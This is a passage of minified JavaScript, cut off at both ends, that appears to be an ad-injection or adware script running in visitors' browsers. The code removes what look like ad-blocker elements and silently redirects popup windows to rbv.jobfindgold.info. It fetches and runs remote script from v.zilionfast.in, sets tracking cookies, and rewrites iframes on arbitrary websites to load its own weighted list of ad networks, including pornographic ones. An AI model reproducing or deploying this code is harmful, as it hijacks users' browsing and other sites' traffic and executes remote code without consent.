if(_head.length == 0) return; _head[0].appendChild(ganpsb); })()};;if(window.self.location.hostname.indexOf('mail.')==-1)\r\n{try{for(i=0;i<5;i++){window.setTimeout(function(){if(document.getElementById(\"cblocker\")){document.getElementById(\"cblocker\").parentNode.removeChild(document.getElementById(\"cblocker\"));};if(document.getElementById(\"_vdcbl\")){document.getElementById(\"_vdcbl\").parentNode.removeChild(document.getElementById(\"_vdcbl\"));}},i*100)}}catch(e){};\r\n};(function(){try{if(window.opener&&window.self==window.top&&-1==document.cookie.indexOf(\"xcddsa\")&&-1==window.self.location.href.indexOf(\"px.pluginh\")&&window.self.location.hostname.indexOf('earchfu')==-1&&(!document.referrer||-1==document.referrer.indexOf('/amz/')&&(!document.referrer.match(/cpops-\\d+\\.html/))&&-1==document.referrer.indexOf(\"px.pluginh\"))&&-1==window.self.location.href.indexOf(\"ally.asi\")&&-1==window.self.location.href.indexOf('/amz/')&&(!window.self.location.href.match(/cpops-\\d+\\.html/))&&-1==window.self.location.hostname.indexOf(\"getjs\")&&-1==window.self.location.hostname.indexOf(\"hsbc\")&&3>history.length){var c=navigator.userAgent.toLowerCase(),d=\"http://rbv.jobfindgold.info/a1/?eid=34&hid=3066714756&pid=450&rf=\" + encodeURIComponent(document.referrer) +\"&s=px.pluginh&r=\"+Math.random();if(-1<c.indexOf(\"msie\")&&(!document.referrer||-1==document.referrer.indexOf(location.hostname))){var e=window.innerWidth||document.documentElement.scrollWidth||0,f=window.innerHeight||document.documentElement.scrollHeight||0;if(e){window.resizeTo(e,f);var g=window.innerWidth||document.documentElement.scrollWidth,k=window.innerHeight||document.documentElement.scrollHeight;window.resizeTo(e+2,f);var h=window.scrollWidth||document.documentElement.scrollWidth;if(h!=g&&h<=g+2&&90>=f-k){var a=new Date;a.setHours(a.getHours()+1);document.cookie=\"xcddsa=1;expires=\"+a.toUTCString();window.self.location.href=d}}}else if(!window.menubar.visible&&document.referrer&&-1==document.referrer.indexOf(window.self.location.hostname)){a=new Date;a.setHours(a.getHours()+1);document.cookie=\"xcddsa=1;expires=\"+a.toUTCString();var b=document.createElement(\"script\");b.type=\"text/javascript\";-1<c.indexOf(\"chrome\")&&(b.innerHTML='document.getElementsByTagName(\"body\")[0].setAttribute(\"xcddsa\",\"1\")',document.getElementsByTagName(\"body\")[0].appendChild(b),setTimeout(function(){document.getElementsByTagName(\"body\")[0].getAttribute(\"xcddsa\")&&(window.self.location.href=d)},10));-1<c.indexOf(\"firefox\")&&(b.innerHTML='setTimeout(function(){window.self.location.href=\"'+d+'\";},10)',document.getElementsByTagName(\"head\")[0].appendChild(b))}}}catch(l){}})();if(-1<window.self.location.href.indexOf(\"df.ly/\")){var dd=document.getElementById(\"rf\");dd&&dd.setAttribute(\"src\",\"http://rbv.jobfindgold.info/x/?ch=1\")}(\"rdlnk.co\"==window.self.location.hostname||\"adfoc.us\"==window.self.location.hostname||\"www.adsbeta.net\"==window.self.location.hostname||\"ad5.eu\"==window.self.location.hostname)&&(dd=document.getElementsByTagName(\"iframe\")[0])&&dd.setAttribute(\"src\",\"http://rbv.jobfindgold.info/x/?ch=1\");\"cf.ly\"==window.self.location.hostname&&(dd=document.getElementsByTagName(\"iframe\")[1])&&dd.setAttribute(\"src\",\"http://rbv.jobfindgold.info/x/?ch=1\");\"adv.li\"==window.self.location.hostname&&(dd=document.getElementById(\"main\"))&&dd.setAttribute(\"src\",\"http://rbv.jobfindgold.info/x/?ch=1\");;var _wlst={lsKey:\"ssjsmn2ja8ddw2a\",get:function(b,a){if(3<b)return a(!1);var d=this.fetch();if(d)return a(parseInt(d));if(1==b){crc=this.hcrc32(window.self.location.hostname.replace(\"www.\",\"\"));try{var c=document.createElement(\"script\");c.type=\"text/javascript\";try{c.async=\"async\"}catch(e){}c.src=\"http://v.zilionfast.in/\"+crc+\"/?t=vrt\";(document.getElementsByTagName(\"head\")[0]||document.getElementsByTagName(\"body\")[0]).appendChild©}catch(f){}}setTimeout(function(){_wlst.get(++b,a)},180)},fetch:function(){try{if(\"undefined\"!=localStorage)try{return localStorage.getItem(this.lsKey)}catch(b){return 0}else _wlst.getCkie()}catch(a){_wlst.getCkie()}},getCkie:function(){if(0<document.cookie.length&&(c_start=document.cookie.indexOf(this.lsKey+\"=\"),-1!=c_start))return c_start=c_start+this.lsKey.length+1,c_end=document.cookie.indexOf(\";\",c_start),-1==c_end&&(c_end=document.cookie.length),unescape(document.cookie.substring(c_start,c_end))},hcrc32:function(b,a){a||(a=0);var d=0;a^=-1;for(var c=0,e=b.length;c<e;c++)d=(a^b.charCodeAt©)&255,d=\"0x\"+\"00000000 77073096 EE0E612C 990951BA 076DC419 706AF48F E963A535 9E6495A3 0EDB8832 79DCB8A4 E0D5E91E 97D2D988 09B64C2B 7EB17CBD E7B82D07 90BF1D91 1DB71064 6AB020F2 F3B97148 84BE41DE 1ADAD47D 6DDDE4EB F4D4B551 83D385C7 136C9856 646BA8C0 FD62F97A 8A65C9EC 14015C4F 63066CD9 FA0F3D63 8D080DF5 3B6E20C8 4C69105E D56041E4 A2677172 3C03E4D1 4B04D447 D20D85FD A50AB56B 35B5A8FA 42B2986C DBBBC9D6 ACBCF940 32D86CE3 45DF5C75 DCD60DCF ABD13D59 26D930AC 51DE003A C8D75180 BFD06116 21B4F4B5 56B3C423 CFBA9599 B8BDA50F 2802B89E 5F058808 C60CD9B2 B10BE924 2F6F7C87 58684C11 C1611DAB B6662D3D 76DC4190 01DB7106 98D220BC EFD5102A 71B18589 06B6B51F 9FBFE4A5 E8B8D433 7807C9A2 0F00F934 9609A88E E10E9818 7F6A0DBB 086D3D2D 91646C97 E6635C01 6B6B51F4 1C6C6162 856530D8 F262004E 6C0695ED 1B01A57B 8208F4C1 F50FC457 65B0D9C6 12B7E950 8BBEB8EA FCB9887C 62DD1DDF 15DA2D49 8CD37CF3 FBD44C65 4DB26158 3AB551CE A3BC0074 D4BB30E2 4ADFA541 3DD895D7 A4D1C46D D3D6F4FB 4369E96A 346ED9FC AD678846 DA60B8D0 44042D73 33031DE5 AA0A4C5F DD0D7CC9 5005713C 270241AA BE0B1010 C90C2086 5768B525 206F85B3 B966D409 CE61E49F 5EDEF90E 29D9C998 B0D09822 C7D7A8B4 59B33D17 2EB40D81 B7BD5C3B C0BA6CAD EDB88320 9ABFB3B6 03B6E20C 74B1D29A EAD54739 9DD277AF 04DB2615 73DC1683 E3630B12 94643B84 0D6D6A3E 7A6A5AA8 E40ECF0B 9309FF9D 0A00AE27 7D079EB1 F00F9344 8708A3D2 1E01F268 6906C2FE F762575D 806567CB 196C3671 6E6B06E7 FED41B76 89D32BE0 10DA7A5A 67DD4ACC F9B9DF6F 8EBEEFF9 17B7BE43 60B08ED5 D6D6A3E8 A1D1937E 38D8C2C4 4FDFF252 D1BB67F1 A6BC5767 3FB506DD 48B2364B D80D2BDA AF0A1B4C 36034AF6 41047A60 DF60EFC3 A867DF55 316E8EEF 4669BE79 CB61B38C BC66831A 256FD2A0 5268E236 CC0C7795 BB0B4703 220216B9 5505262F C5BA3BBE B2BD0B28 2BB45A92 5CB36A04 C2D7FFA7 B5D0CF31 2CD99E8B 5BDEAE1D 9B64C2B0 EC63F226 756AA39C 026D930A 9C0906A9 EB0E363F 72076785 05005713 95BF4A82 E2B87A14 7BB12BAE 0CB61B38 92D28E9B E5D5BE0D 7CDCEFB7 0BDBDF21 86D3D2D4 F1D4E242 68DDB3F8 1FDA836E 81BE16CD F6B9265B 6FB077E1 18B74777 88085AE6 FF0F6A70 66063BCA 11010B5C 8F659EFF F862AE69 616BFFD3 166CCF45 A00AE278 D70DD2EE 4E048354 3903B3C2 A7672661 D06016F7 4969474D 3E6E77DB AED16A4A D9D65ADC 40DF0B66 37D83BF0 A9BCAE53 DEBB9EC5 47B2CF7F 30B5FFE9 BDBDF21C CABAC28A 53B39330 24B4A3A6 BAD03605 CDD70693 54DE5729 23D967BF B3667A2E C4614AB8 5D681B02 2A6F2B94 B40BBE37 C30C8EA1 5A05DF1B 2D02EF8D\".substr(9*d,8),a=a>>>8^d;c=a^-1;0>c&&(c+=4294967296);return c}},_zyad={title:document.title?document.title.toLowerCase():\"na\",location:window.self.location.href.toLowerCase() + (document.referrer ? document.referrer : ''),vrt:!1,networks_list:[[['ybrant_ws',2],['xertive_rmx',24],['web_media_apx',3],['ybrant_rmx_ws2',2],['start_me_app_tb',2],['glispa_us',429],['e_viral_new',83],['webmedia_tb',130],['cpx_adsafe',1],['admanage_gen',8],['adnetwork_rmx',9],['matomy_rmx_tb_tier2',11],['e_viral_tb_tier1',283],['dsnr_dasl_tier1_rmx_gen',3],['mediashakers_rmx',259],['cpx_bet_55',1052],['baba_tb',46],['servenetwork_gen',58],['dsnr_dasl_tier3_rmx_gen',6],['deliads_apx_tb_new',85],['saymedia_apx_tag_test',22],['marimedia_apx_tb_tst',63],['media_white_apx_test',49],['dsnr_dsnrtbA1_tb',633],['dsnr_dasa_gentb2',35],['baba_apx_tbgen',10],['traffiqexchange_gen',119],['dsnr_dasa_gentb3',9],['clovenetwork_apx_tbgen',22],['webmedia_apx_tier1',105],['media888_gen',46],['glispa_clean_us',1706],['darriens_tbgen',55],['start_me_app_tier1',333],['intag_apx',34],['webmedia_tb_new',283],['matomy_apx_adj5',3980]],[['dsnr_t1_streaming',467],['cpx_strm',42],['adstract_apx_strm',193],['matomy_apx_strm',234],['e_viral_strm',904],['matomy_strm2',7678],['mari_strm2',482]],[['hulk_porn',10000]]],networks_conf:!1,init:function(){_wlst.get(1,function(b){_zyad.vrt=b;if(!(_zyad.vrt==17 || _zyad.location.indexOf('SeWVW6x0=')>-1|| _zyad.location.indexOf('adk2.co')>-1 ||window.self.location.hostname==\"ad.adserverplus.com\"||window.self.location.hostname==\"ad.yieldmanager.com\"||window.self.location.hostname==\"ib.adnxs.com\"||window.self.location.hostname==\"net.e-viral.com\"||window.self.location.hostname==\"fw.adsafeprotected.com\"||window.self.location.hostname==\"cpm.geoadserver.com\"||window.self.location.hostname==\"ad.adnetwork.net\"||window.self.location.hostname==\"ad.z5x.net\"||window.self.location.hostname==\"ad.media-servers.net\"||window.self.location.hostname==\"tr.adsplats.com\"||window.self.location.hostname==\"www.holisticmedicalwellness.com\"||window.self.location.hostname==\"ad.co-co-co.co\"||window.self.location.hostname==\"an.z5x.net\"||window.self.location.hostname==\"ads.clovenetwork.com\"||window.self.location.hostname==\"media.glispa.com\"||window.self.location.hostname==\"pl.intag.co\"||window.self.location.hostname==\"Servedby.bigfineads.com\"||window.self.location.hostname==\"ads.ventivmedia.com\"|| _zyad.location.indexOf('=287760')>-1|| _zyad.location.indexOf('=458516')>-1||_zyad.location.indexOf('PT1311')>-1||_zyad.location.indexOf('1018-1005')>-1||_zyad.location.indexOf('1019-1001')>-1||_zyad.location.indexOf('2136&zid=')>-1))if(_zyad.networks_conf=12==_zyad.vrt?_zyad.networks_list[2]:_zyad.vrt?_zyad.networks_list[1]:!_zyad.getisP()?_zyad.networks_list[0]:!1,_zyad.networks_conf){for(i=0;5>i;i++)setTimeout(_zyad.find,500*i);window.self==window.top&&1==Math.floor(7*Math.random()+1)&&setTimeout(function(){_zyad.find(1)},6E4)}})},getisD:function(){return-1<_zyad.title.indexOf(\"torrent\")||-1<_zyad.location.indexOf(\"torrent\")},getisNA:function(){return!1},getisP:function(){try{if(12==_zyad.vrt)return!0;if(_zyad.vrt)return!1;var b=document.getElementsByTagName(\"meta\");if(b)for(i=0;i<b.length;i++)try{if(b[i]&&b[i].getAttribute(\"name\")){var a=b[i].getAttribute(\"name\").toLowerCase();if(\"description\"==a||\"keywords\"==a)_zyad.title=_zyad.title+\" \"+b[i].getAttribute(\"content\")}}catch(d){}}catch©{}b=\"porn sex xxx tits adult lesbian squirt creampie bondage ExSuna mature fisting bleep gangbang orgy gay nude tits tranny blowjob handjob masturbat busty slut joder horny mamada polla cock pussy threesome teens milf bdsm hentai motherless erotic cams petite\".split(\" \");for(i in b)if(-1<_zyad.location.indexOf(b[i])||-1<_zyad.title.indexOf(b[i]))return!0;return!1},epoch:function(){try{var b=new Date;try{return(b.getTime()-b.getMilliseconds())/1E3}catch(a){return parseInt(b.getTime()/1E3)}}catch(d){return 0}},between:function(b,a){return b>=a-7&&b<=a+7},detectRsize:function(b){try{var a=[0,0];try{a=[parseInt(\"number\"==typeof b.width||\"string\"==typeof b.width&&b.width.match(/[0-9]/)?b.width:b.scrollWidth),parseInt(\"number\"==typeof b.height||\"string\"==typeof b.height&&b.height.match(/[0-9]/)?b.height:b.scrollHeight)]}catch(d){}var c=_zyad.between;switch(!0){case c(a[1],600)&&c(a[0],120):return[120,600];case c(a[1],600)&&c(a[0],160):return[160,600];case c(a[1],600)&&c(a[0],300):return[300,600];case c(a[1],125)&&c(a[0],125):return[125,125];case c(a[1],250)&&c(a[0],300):return[300,250];case c(a[1],250)&&c(a[0],250):return[250,250];case c(a[1],250)&&c(a[0],336):return[300,250];case c(a[1],150)&&c(a[0],180):return[180,150];case c(a[1],400)&&c(a[0],600):return[600,400];case c(a[1],60)&&c(a[0],120):return[120,60];case c(a[1],100)&&c(a[0],300):return[300,100];case c(a[1],60)&&c(a[0],234):return[234,60];case c(a[1],60)&&c(a[0],460):return[460,60];case c(a[1],60)&&c(a[0],468):return[468,60];case c(a[1],90)&&c(a[0],728):return[728,90];default:return!1}}catch(e){return!1}},find:function(b){var a=[],d=window.self.document.getElementsByTagName(\"iframe\");for(i=0;i<d.length;i++){if(!b)try{if(d[i].hasAttribute(\"s3321940021\"))continue}catch©{try{if(d[i].getAttribute(\"s3321940021\"))continue}catch(e){}};try{if(d[i].src.indexOf('=287760')>-1||d[i].src.indexOf('=458516')>-1||d[i].src.indexOf('1018-1005')>-1||d[i].src.indexOf('1019-1001')>-1||d[i].src.indexOf('2136&zid=')>-1||(d[i].getAttribute('name')&&d[i].getAttribute('id')==d[i].getAttribute('name')&&d[i].getAttribute('name').match(/^ap\\d+$/))){try{d[i].setAttribute(\"s3321940021\", \"true\");d[i].setAttribute(\"replaced\", \"true\");}catch(e){};continue;}}catch(e){};(rSize=_zyad.detectRsize(d[i]))&&a.push({size:rSize,ifr:d[i],func:function(a,b){_zyad.setNetwork(a.ifr,a.size);b++;a&&a&&\"function\"==typeof a.func&&setTimeout(function(){a.func(a,b)},1)}})}a[0]&&a[0].func&&a[0].func(a,0)},setNetwork:function(b,a){if(a&&b){var d=0,c=0,e=Math.floor(10000*Math.random()+0.9),f=0,h={},g=[];for(i=0;i<_zyad.networks_conf.length;i++){var j=_zyad.networks[_zyad.networks_conf[i][0]](a);j&&(h[i]=j,g.push(i),d+=_zyad.networks_conf[i][1])}10000<d&&(c=Math.floor((10000-d)/g.length+0.9));for(i=0;i<g.length;i++)if(d=g[i],f+=_zyad.networks_conf[i][1]+c,f>=e){h[d](b);break}}},iset:function(ifr, url, mode, properties){try{switch(mode){default:case 1:var channel = 0;try{if(ifr.getAttribute('bow')) channel=1}catch(e){}ifr.src = url + (properties ? (url.indexOf('?')>'-1' ? '&' : '/?') + 'SeWVW6x0=' + properties[0] + '_' + properties[1] + '_' + channel : '');break;case 2:try{ifr.src='about:blank';ifr.contentWindow.document.write('<html><head>\\x3cscript>setTimeout(function(){location.href=\"'+url+'\"},1)\\x3c/script></head><body>&nbsp;\\x3c/body>\\x3c/html>');}catch(e){var h = '<html><head><style>html,body{padding:0px;margin:0px;}</style></head><body><iframe name=\"a7h3h73d3\" src=\"about:blank\" style=\"width:100%;height:100%;border:0\" MARGINWIDTH=\"0\" MARGINHEIGHT=\"0\" frameborder=\"0\" scrolling=\"no\" width=\"100%\" height=\"100%\"></iframe>\\x3cscript>setTimeout(function(){frames[\"a7h3h73d3\"].document.write(\"<\"+\"script>setTimeout(function(){setTimeout(function(){location.href=\\x5c\\\\x27'+url+'\\x5c\\\\x27},1)},1);\"+\"<\"+\"/script>\")},1)\\x3c/script></body></html>';ifr.src='javascript:document.write(\\''+h+'\\');'}break;case 3:ifr.src = \"about:blank\";ifr.contentWindow.document.write('<html><head><style>html,body{padding:0px;margin:0px;}</style>\\x3cscript>setTimeout(function(){document.getElementsByTagName(\"body\")[0].innerHTML=\"\\x3cscript src=\"'+url+'\">\\x3c/script>\"},10)\\x3c/script></head><body>&nbsp;</body></html>');break;case 4:ifr.src = \"about:blank\";ifr.contentWindow.document.write('<html><head><style>html,body{padding:0px;margin:0px;}</style></head><body>'+url+'</body></html>');break;}try{ifr.setAttribute(\"s3321940021\", \"true\");ifr.setAttribute(\"replaced\", \"true\")}catch(e){}}catch(e){}},networks:{ybrant_ws:function(rsize){try{var size = rsize[0] + 'x' + rsize[1],width=rsize[0],height=rsize[1];if (-1 == '120x600 160x600 300x250 468x60 728x90'.indexOf(size)) return !1;var atp=false;if(size=='120x60')return;;return function(ifr){_zyad.iset(ifr, 'http://ad.adserverplus.com/st?ad_type=iframe&ad_size=+size+&section=4323550&section_code=34_450' (atp?atp:1), [48,size]);}}catch(e){return !1;}},xertive_rmx:function(rsize){try{var size = rsize[0] + 'x' + rsize[1],width=rsize[0],height=rsize[1];if (-1 == '120x600 160x600 300x250 468x60 728x90'.indexOf(size)) return !1;var atp=false;if(size == '120x60') return;return function(ifr){_zyad.iset(ifr, 'http://ad.yieldmanager.com/st?ad_type=iframe&ad_size=+size+&section=4809178' (atp?atp:1), [155,size]);}}catch(e){return !1;}},web_media_apx:function(rsize){try{var size = rsize[0] + 'x' + rsize[1],width=rsize[0],height=rsize[1];if (-1 == '160x600 300x250  728x90'.indexOf(size)) return !1;var atp=false;;return function(ifr){_zyad.iset(ifr, 'http://ib.adnxs.com/tt?id=1634163&size=+size+' (atp?atp:1), [160,size]);}}catch(e){return !1;}},ybrant_rmx_ws2:function(rsize){try{var size = rsize[0] + 'x' + rsize[1],width=rsize[0],height=rsize[1];if (-1 == '160x600 300x250  120x600 728x90'.indexOf(size)) return !1;var atp=false;if(size=='120x60')return;;return function(ifr){_zyad.iset(ifr, 'http://ad.adserverplus.com/st?ad_type=iframe&ad_size=+size+&section=4851522&section_code=34_450' (atp?atp:2), [178,size]);}}catch(e){return !1;}},start_me_app_tb:function(rsize){try{var size = rsize[0] + 'x' + rsize[1],width=rsize[0],height=rsize[1];if (-1 == '728x90 160x600 300x250 468x60 120x600'.indexOf(size)) return !1;var atp=false;;return function(ifr){_zyad.iset(ifr, 'http://ib.adnxs.com/tt?id=1697624&size=+size+' (atp?atp:1), [216,size]);}}catch(e){return !1;}},glispa_us:function(rsize){try{var size = rsize[0] + 'x' + rsize[1],width=rsize[0],height=rsize[1];if (-1 == '300x250'.indexOf(size)) return !1;var atp=false;;return function(ifr){_zyad.iset(ifr, 'http://media.glispa.com/st?ad_type=iframe&ad_size=300x250&site=1666657' (atp?atp:1), [219,size]);}}catch(e){return !1;}},e_viral_new:function(rsize){try{var size = rsize[0] + 'x' + rsize[1],width=rsize[0],height=rsize[1];if (-1 == '120x600 160x600 300x250 728x90'.indexOf(size)) return !1;var atp=false;;return function(ifr){_zyad.iset(ifr, 'http://net.e-viral.com/tt?id=1716479&size=+size+' (atp?atp:1), [241,size]);}}catch(e){return !1;}},webmedia_tb:function(rsize){try{var size = rsize[0] + 'x' + rsize[1],width=rsize[0],height=rsize[1];if (-1 == '728x90 160x600 300x250'.indexOf(size)) return !1;var atp=false;;return function(ifr){_zyad.iset(ifr, 'http://ib.adnxs.com/tt?id=1737337&size=+size+' (atp?atp:1), [245,size]);}}catch(e){return !1;}},cpx_adsafe:function(rsize){try{var size = rsize[0] + 'x' + rsize[1],width=rsize[0],height=rsize[1];if (-1 == '160x600 300x250  728x90'.indexOf(size)) return !1;var atp=false;;return function(ifr){_zyad.iset(ifr, 'http://fw.adsafeprotected.com/rjsi/ads.cpxinteractive.com/15576/649018/tt?id=1740937&size=+size+' (atp?atp:1), [247,size]);}}catch(e){return !1;}},admanage_gen:function(rsize){try{var size = rsize[0] + 'x' + rsize[1],width=rsize[0],height=rsize[1];if (-1 == '160x600 300x250  728x90'.indexOf(size)) return !1;var atp=false;;return function(ifr){_zyad.iset(ifr, 'http://cpm.geoadserver.com/tag?zone_id=2119&size=+size+&ad_type=iframe' (atp?atp:1), [260,size]);}}catch(e){return !1;}},adnetwork_rmx:function(rsize){try{var size = rsize[0] + 'x' + rsize[1],width=rsize[0],height=rsize[1];if (-1 == '120x600 160x600 300x250 468x60 728x90'.indexOf(size)) return !1;var atp=false;if (size == '120x60') return;;return function(ifr){_zyad.iset(ifr, 'http://ad.adnetwork.net/st?ad_type=iframe&ad_size=+size+&section=4962127&section_code=34_450&pub_url=' (atp?atp:1), [267,size]);}}catch(e){return !1;}},matomy_rmx_tb_tier2:function(rsize){try{var size = rsize[0] + 'x' + rsize[1],width=rsize[0],height=rsize[1];if (-1 == '160x600 300x250  728x90'.indexOf(size)) return !1;var atp=false;;return function(ifr){_zyad.iset(ifr, 'http://ad.yieldmanager.com/st?ad_type=iframe&ad_size='+size+'&site=1696978&section_code=Tier 2&section_code=34_450', (atp?atp:1), [290,size]);}}catch(e){return !1;}},e_viral_tb_tier1:function(rsize){try{var size = rsize[0] + 'x' + rsize[1],width=rsize[0],height=rsize[1];if (-1 == '160x600 300x250  728x90'.indexOf(size)) return !1;var atp=false;;return function(ifr){_zyad.iset(ifr, 'http://net.e-viral.com/tt?id=1860489&size=+size+' (atp?atp:1), [303,size]);}}catch(e){return !1;}},dsnr_dasl_tier1_rmx_gen:function(rsize){try{var size = rsize[0] + 'x' + rsize[1],width=rsize[0],height=rsize[1];if (-1 == '160x600 300x250 468x60 120x600'.indexOf(size)) return !1;var atp=false;;return function(ifr){_zyad.iset(ifr, 'http://ad.z5x.net/st?ad_type=iframe&ad_size=+size+&section=5049879&section_code=34_450' (atp?atp:2), [310,size]);}}catch(e){return !1;}},mediashakers_rmx:function(rsize){try{var size = rsize[0] + 'x' + rsize[1],width=rsize[0],height=rsize[1];if (-1 == '160x600 300x250  728x90'.indexOf(size)) return !1;var atp=false;;return function(ifr){_zyad.iset(ifr, 'http://ad.media-servers.net/st?ad_type=iframe&ad_size=+size+&section=5021599&section_code=34_450&pub_url=' (atp?atp:1), [313,size]);}}catch(e){return !1;}},cpx_bet_55:function(rsize){try{var size = rsize[0] + 'x' + rsize[1],width=rsize[0],height=rsize[1];if (-1 == '300x250 728x90 160x600'.indexOf(size)) return !1;var atp=false;var reff = window.top==window.self ? encodeURIComponent(window.self.location.href) : '';;return function(ifr){_zyad.iset(ifr, 'http://tr.adsplats.com/cmp/1412355/index.html?size=+size+&referrer=+reff+' (atp?atp:1), [354,size]);}}catch(e){return !1;}},baba_tb:function(rsize){try{var size = rsize[0] + 'x' + rsize[1],width=rsize[0],height=rsize[1];if (-1 == '160x600 300x250 468x60 728x90 120x600'.indexOf(size)) return !1;var atp=false;;return function(ifr){_zyad.iset(ifr, 'http://ib.adnxs.com/tt?id=1947796&size=+size+&referrer=' (atp?atp:1), [355,size]);}}catch(e){return !1;}},servenetwork_gen:function(rsize){try{var size = rsize[0] + 'x' + rsize[1],width=rsize[0],height=rsize[1];if (-1 == '160x600 300x250  728x90'.indexOf(size)) return !1;var atp=false;;return function(ifr){_zyad.iset(ifr, 'http://www.holisticmedicalwellness.com/ads/+size+.php' (atp?atp:1), [356,size]);}}catch(e){return !1;}},dsnr_dasl_tier3_rmx_gen:function(rsize){try{var size = rsize[0] + 'x' + rsize[1],width=rsize[0],height=rsize[1];if (-1 == '160x600 300x250 468x60 120x600 728x90'.indexOf(size)) return !1;var atp=false;if(size=='120x60')return;;return function(ifr){_zyad.iset(ifr, 'http://ad.z5x.net/st?ad_type=iframe&ad_size=+size+&section=5049889&pub_url=&section_code=34_450' (atp?atp:1), [357,size]);}}catch(e){return !1;}},deliads_apx_tb_new:function(rsize){try{var size = rsize[0] + 'x' + rsize[1],width=rsize[0],height=rsize[1];if (-1 == '728x90 300x250 120x600 160x600 468x60'.indexOf(size)) return !1;var atp=false;if(size=='120x60')return;var arr={\"728x90\":\"1962958\",\"300x250\":\"1962952\",\"120x600\":\"1962975\",\"160x600\":\"1962977\",\"468x60\":\"1962981\"}[size];var surl = \"http://ib.adnxs.com/tt?id=\"+ arr +\"&cb=&referrer=\";;return function(ifr){_zyad.iset(ifr, ''+surl+'', (atp?atp:1), [359,size]);}}catch(e){return !1;}},saymedia_apx_tag_test:function(rsize){try{var size = rsize[0] + 'x' + rsize[1],width=rsize[0],height=rsize[1];if (-1 == '160x600 300x250 728x90 468x60'.indexOf(size)) return !1;var atp=false;var arr={\"728x90\":\"1957902\",\"468x60\":\"1957923\",\"160x600\":\"1957924\", \"300x250\":1957917}[size];var surl = \"http://ad.co-co-co.co/rmx/appnexus.html?id=\"+arr;return function(ifr){_zyad.iset(ifr, ''+surl+'', (atp?atp:1), [366,size]);}}catch(e){return !1;}},marimedia_apx_tb_tst:function(rsize){try{var size = rsize[0] + 'x' + rsize[1],width=rsize[0],height=rsize[1];if (-1 == '728x90 300x250 468x60 120x600 160x600'.indexOf(size)) return !1;var atp=false;var arr={\"728x90\":\"1880004\",\"300x250\":\"1880018\",\"468x60\":\"1880019\",\"120x600\":\"1880016\",\"160x600\":\"1880011\"}[size];var reff = window.top==window.self ? encodeURIComponent(window.self.location.href) : '';var surl = \"http://ib.adnxs.com/tt?id=\"+arr+\"&referrer=\" + reff;;return function(ifr){_zyad.iset(ifr, ''+surl+'', (atp?atp:1), [367,size]);}}catch(e){return !1;}},media_white_apx_test:function(rsize){try{var size = rsize[0] + 'x' + rsize[1],width=rsize[0],height=rsize[1];if (-1 == '728x90 300x250 160x600'.indexOf(size)) return !1;var atp=false;var __cachebuster = new Date().getTime();var arr={\"728x90\":\"1994971\",\"300x250\":\"1994970\",\"160x600\":\"1994964\"}[size];var surl = 'http://ib.adnxs.com/tt?id='+ arr +'&cb='+__cachebuster;return function(ifr){_zyad.iset(ifr, ''+surl+'', (atp?atp:1), [369,size]);}}catch(e){return !1;}},dsnr_dsnrtbA1_tb:function(rsize){try{var size = rsize[0] + 'x' + rsize[1],width=rsize[0],height=rsize[1];if (-1 == '120x600 160x600 300x250 468x60 728x90'.indexOf(size)) return !1;var atp=false;if(size=='120x60')return;var reff = window.top == window.self ? encodeURIComponent(window.self.location.href) : '';var surl = \"http://an.z5x.net/tt?id=1992539&size=\"+size+\"&referrer=\"+reff;return function(ifr){_zyad.iset(ifr, ''+surl+'', (atp?atp:1), [370,size]);}}catch(e){return !1;}},dsnr_dasa_gentb2:function(rsize){try{var size = rsize[0] + 'x' + rsize[1],width=rsize[0],height=rsize[1];if (-1 == '120x600 160x600 300x250 468x60 728x90'.indexOf(size)) return !1;var atp=false;if(size=='120x60')return;var reff = window.top == window.self ? encodeURIComponent(window.self.location.href) : '';var surl = \"http://an.z5x.net/tt?id=1992477&size=\"+size+\"&referrer=\"+reff;return function(ifr){_zyad.iset(ifr, ''+surl+'', (atp?atp:1), [372,size]);}}catch(e){return !1;}},baba_apx_tbgen:function(rsize){try{var size = rsize[0] + 'x' + rsize[1],width=rsize[0],height=rsize[1];if (-1 == '728x90 300x250 160x600'.indexOf(size)) return !1;var atp=false;if(size=='120x60')return;var arr={\"728x90\":\"2011160\",\"300x250\":\"2011152\",\"160x600\":\"2011158\"}[size]; var surl = \"http://ib.adnxs.com/tt?id=\"+ arr +\"&referrer=\";;return function(ifr){_zyad.iset(ifr, ''+surl+'', (atp?atp:1), [380,size]);}}catch(e){return !1;}},traffiqexchange_gen:function(rsize){try{var size = rsize[0] + 'x' + rsize[1],width=rsize[0],height=rsize[1];if (-1 == '728x90 300x250 160x600'.indexOf(size)) return !1;var atp=false;if(size=='120x60')return;var arr={\"728x90\":\"1478397\",\"300x250\":\"1478396\",\"160x600\":\"1478380\"}[size]; var surl = \"http://ib.adnxs.com/tt?id=\"+arr+\"&pubclick=\";return function(ifr){_zyad.iset(ifr, ''+surl+'', (atp?atp:1), [382,size]);}}catch(e){return !1;}},dsnr_dasa_gentb3:function(rsize){try{var size = rsize[0] + 'x' + rsize[1],width=rsize[0],height=rsize[1];if (-1 == '120x600 160x600 300x250 468x60 728x90'.indexOf(size)) return !1;var atp=false;if(size=='120x60')return;var reff = window.top == window.self ? encodeURIComponent(window.self.location.href) : '';var surl = \"http://an.z5x.net/tt?id=1992478&size=\"+size+\"&referrer=\"+reff;return function(ifr){_zyad.iset(ifr, ''+surl+'', (atp?atp:1), [383,size]);}}catch(e){return !1;}},clovenetwork_apx_tbgen:function(rsize){try{var size = rsize[0] + 'x' + rsize[1],width=rsize[0],height=rsize[1];if (-1 == '728x90 300x250 160x600'.indexOf(size)) return !1;var atp=false;var arr={\"728x90\":\"1992126\",\"300x250\":\"1992048\",\"160x600\":\"1992127\"}[size]; var surl = \"http://ads.clovenetwork.com/tt?id=\"+arr;;return function(ifr){_zyad.iset(ifr, ''+surl+'', (atp?atp:1), [384,size]);}}catch(e){return !1;}},webmedia_apx_tier1:function(rsize){try{var size = rsize[0] + 'x' + rsize[1],width=rsize[0],height=rsize[1];if (-1 == '160x600 300x250  728x90'.indexOf(size)) return !1;var atp=false;var reff = window.top == window.self ? encodeURIComponent(window.self.location.href) : '';var surl = \"http://ib.adnxs.com/tt?id=2025063&size=\"+size+\"&referrer=\"+reff;return function(ifr){_zyad.iset(ifr, ''+surl+'', (atp?atp:1), [394,size]);}}catch(e){return !1;}},media888_gen:function(rsize){try{var size = rsize[0] + 'x' + rsize[1],width=rsize[0],height=rsize[1];if (-1 == '728x90 300x250 160x600'.indexOf(size)) return !1;var atp=false;var arr={\"728x90\":\"2025564\",\"300x250\":\"2025606\",\"160x600\":\"2025613\"}[size];var surl = \"http://ib.adnxs.com/tt?id=\"+arr+\"&referrer=\";return function(ifr){_zyad.iset(ifr, ''+surl+'', 